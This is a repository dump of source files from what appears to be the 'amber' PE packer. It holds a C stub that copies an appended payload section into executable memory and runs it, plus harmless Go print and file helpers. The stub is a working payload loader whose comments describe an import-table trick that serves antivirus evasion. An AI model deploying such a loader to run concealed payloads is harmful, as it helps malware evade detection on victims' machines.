https://raw.githubusercontent.com/EgeBalci/amber/f6eb2dc4b4b1a408d23ad376b16ac0c9a7b4c54d/stub/amber.ico
--------------------------------------------------------------------------------
/stub/stub.c:
--------------------------------------------------------------------------------
#include <string.h>
#include <windows.h>
2 |
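/*
 * Stub entry point.
 *
 * The packer appends the loader + payload as the last section of this
 * executable; main() locates that section in the running image, copies its
 * raw bytes into a fresh executable allocation and jumps to them. Nothing
 * else happens on the stub side.
 *
 * Returns 0 if the payload returns, 1 if the image base or section table
 * cannot be resolved, 2 if the executable buffer cannot be allocated.
 */
int main(int argc, char const *argv[])
{
    (void)argc;
    (void)argv;

    /* Never used for their result: these calls exist only so the stub's
     * import table contains LoadLibrary/GetProcAddress entries (the embedded
     * IAT-based resolver can only find APIs the host already imports).
     * The module really is USER32, whatever the handle is used for. */
    HMODULE user32 = LoadLibrary("USER32.dll");
    GetProcAddress(user32, "VirtualAlloc");

    /* Actual load address of this image, i.e. where the loader mapped us. */
    BYTE *base = (BYTE *)GetModuleHandle(NULL);
    if (base == NULL)
        return 1;

    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)base;
    /* IMAGE_NT_HEADERS is the 32- or 64-bit variant for the current build, so
     * no #if is needed; byte arithmetic on BYTE* avoids the void* extension
     * the original relied on. */
    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)(base + dosHeader->e_lfanew);

    WORD numberOfSections = ntHeaders->FileHeader.NumberOfSections;
    if (numberOfSections == 0)
        return 1; /* the original would dereference a NULL section header here */

    /* The section table immediately follows the optional header. */
    PIMAGE_SECTION_HEADER sections = (PIMAGE_SECTION_HEADER)(
        (BYTE *)&ntHeaders->OptionalHeader + ntHeaders->FileHeader.SizeOfOptionalHeader);
    PIMAGE_SECTION_HEADER last = &sections[numberOfSections - 1];
    DWORD size = last->SizeOfRawData;

    /* RWX is kept deliberately: the loader blobs in pkg/static.go end with a
     * rep stosb (f3 aa) that appears to write back into memory the loader
     * occupies, so tightening this to RX with VirtualProtect after the copy
     * would need to be verified against the loader source first. */
    unsigned char *buffer = (unsigned char *)VirtualAlloc(
        NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (buffer == NULL)
        return 2;

    /* Copy from the live mapping rather than from OptionalHeader.ImageBase:
     * base is where this image actually is, ImageBase is only the preferred
     * address recorded in the headers. */
    memcpy(buffer, base + last->VirtualAddress, size);

    /* The first argument is a process handle, not a module base; the original
     * passed moduleHandle with a NULL range, which flushed nothing. */
    FlushInstructionCache(GetCurrentProcess(), buffer, size);

    ((void (*)(void))buffer)();

    return 0;
}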
43 |
--------------------------------------------------------------------------------
/utils/helpers.go:
--------------------------------------------------------------------------------
1 | package utils
2 |
3 | import (
4 | "fmt"
5 | "math/rand"
6 | "os"
7 | "runtime"
8 | "strings"
9 |
10 | "github.com/fatih/color"
11 | "github.com/sirupsen/logrus"
12 | )
13 |
// PrintSuccess writes a bold green "[*] " marker to stdout followed by the
// message formatted with fmt.Printf semantics. No newline is appended; the
// caller includes it in formatstr.
func PrintSuccess(formatstr string, a ...interface{}) {
	marker := color.New(color.FgGreen, color.Bold)
	marker.Print("[*] ")
	fmt.Printf(formatstr, a...)
}
19 |
// PrintStatus writes a bold blue "[*] " marker to stdout followed by the
// message formatted with fmt.Printf semantics. No newline is appended.
func PrintStatus(formatstr string, a ...interface{}) {
	marker := color.New(color.FgBlue, color.Bold)
	marker.Print("[*] ")
	fmt.Printf(formatstr, a...)
}
25 |
// PrintWarning writes a bold yellow "[*] " marker to stdout followed by the
// message formatted with fmt.Printf semantics. No newline is appended.
func PrintWarning(formatstr string, a ...interface{}) {
	marker := color.New(color.FgYellow, color.Bold)
	marker.Print("[*] ")
	fmt.Printf(formatstr, a...)
}
31 |
// PrintErr writes a bold red "[-] " marker followed by the message in bold
// white. Unlike the other Print* helpers the message itself goes through the
// color package rather than fmt, so it is also colorized. No newline is
// appended.
func PrintErr(formatstr string, a ...interface{}) {
	color.New(color.FgRed, color.Bold).Print("[-] ")
	color.New(color.FgWhite, color.Bold).Printf(formatstr, a...)
}
38 |
// PrintGreen prints the formatted message in bold green with no marker and
// no trailing newline.
func PrintGreen(formatstr string, a ...interface{}) {
	color.New(color.FgGreen, color.Bold).Printf(formatstr, a...)
}
43 |
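// PrintFatal logs err prefixed with the upper-cased name of the calling
// function and terminates the process (logrus.Fatal* exit with status 1).
// A nil err is a no-op, so it can be used as an unconditional check.
func PrintFatal(err error) {
	if err == nil {
		return
	}
	pc, _, _, ok := runtime.Caller(1)
	details := runtime.FuncForPC(pc)
	if !ok || details == nil {
		logrus.Fatal(err)
		return
	}
	// FuncForPC yields the fully qualified name, e.g.
	// "github.com/user/repo/pkg.Pack" or "pkg.(*T).Method". The original
	// took the second "."-separated element, which for an import path that
	// itself contains dots is a path fragment ("com/user/repo/pkg"), not the
	// function, and would index out of range on a dotless name. Use the
	// segment after the last dot instead.
	name := details.Name()
	if i := strings.LastIndex(name, "."); i >= 0 {
		name = name[i+1:]
	}
	logrus.Fatalf("%s: %s\n", strings.ToUpper(name), err)
}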
55 |
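// RandomString returns a string of length characters drawn from [a-zA-Z0-9].
// A length <= 0 yields "" (the original panicked in make on a negative
// length).
//
// NOTE(review): this uses math/rand, which is not cryptographically secure,
// and nothing in this file seeds it — on Go versions before 1.20 that means
// the same sequence on every run unless main seeds it elsewhere. Fine for
// cosmetic names (section names, temp files); do not use it for anything
// that must be unpredictable.
func RandomString(length int) string {
	const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	if length <= 0 {
		return ""
	}
	out := make([]byte, length)
	for i := range out {
		out[i] = charset[rand.Intn(len(charset))]
	}
	return string(out)
}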
65 |
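// GetFileSize returns the size in bytes of the file at filePath.
//
// It stats the path instead of opening it: the original opened the file only
// to call Stat on the handle, which needs read permission and briefly holds a
// descriptor for no benefit. Symlinks are followed, as before. The int return
// type is kept for callers; on 32-bit builds sizes beyond MaxInt wrap, so use
// os.Stat directly where the full int64 range matters.
func GetFileSize(filePath string) (int, error) {
	info, err := os.Stat(filePath)
	if err != nil {
		return 0, err
	}
	return int(info.Size()), nil
}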
79 |
--------------------------------------------------------------------------------